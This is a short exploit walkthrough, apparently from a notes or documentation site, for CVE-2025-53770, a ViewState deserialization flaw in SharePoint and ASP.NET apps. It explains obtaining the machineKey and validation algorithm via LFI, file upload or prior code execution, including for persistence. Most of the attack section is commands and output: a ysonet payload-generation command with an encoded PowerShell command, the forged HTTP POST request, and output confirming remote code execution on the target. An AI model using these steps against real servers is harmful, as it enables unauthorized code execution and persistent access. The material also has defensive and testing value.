CVE-2025-53770

Deserialization of untrusted data in on-premises Microsoft SharePoint Server (or any ASP.NET web application using ViewState) allows an unauthorized attacker to execute code over a network.

Requirements

Web app is using viewState
The machineKey is known
The validationALG is known
appName
ysoserial.net

Extract machineKey and validationALG

To get the machineKey, validationALG and appName you need to have some access to the target machine. If that is through LFI, file upload or you already got code execution and is just looking for additional ways to get persistence, that's great.

The secrets will be stored in either web.config or in the registry. If you got file upload - use the file findMachineKey.aspx to extract the content of both.

PoC || GTFO

Generate payload:

PS C:\> [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes('whoami > C:\Windows\Temp\viewstate_test.txt'))
dwBo...AdAA=

PS C:\> .\ysonet.exe -p ViewState -g TextFormattingRunProperties \
-c "powershell -e dwBo...AdAA=" \
--path="/default.aspx" --apppath="/" --validationalg="HMACSHA256" --validationkey="B29...73D" --islegacy --isdebug
Validation Algorithm: HMACSHA256
Validation Key: B29...73D
...
Calculated __VIEWSTATEGENERATOR: CA0B0334
%2FwEy6...WoRI%3D

Send payload:

POST / HTTP/1.1
Host: 192.168.0.10
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Content-Type: application/x-www-form-urlencoded

__VIEWSTATE=%2FwEy6...VWoRI%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=...&txtName=asdf&btnSubmit=Submit

Confirm RCE on victim:

PS C:\> type C:\Windows\Temp\viewstate_test.txt
iis apppool\.net v4.5

References

https://isc.sans.edu/diary/32174

Last updated 1 month ago

Was this helpful?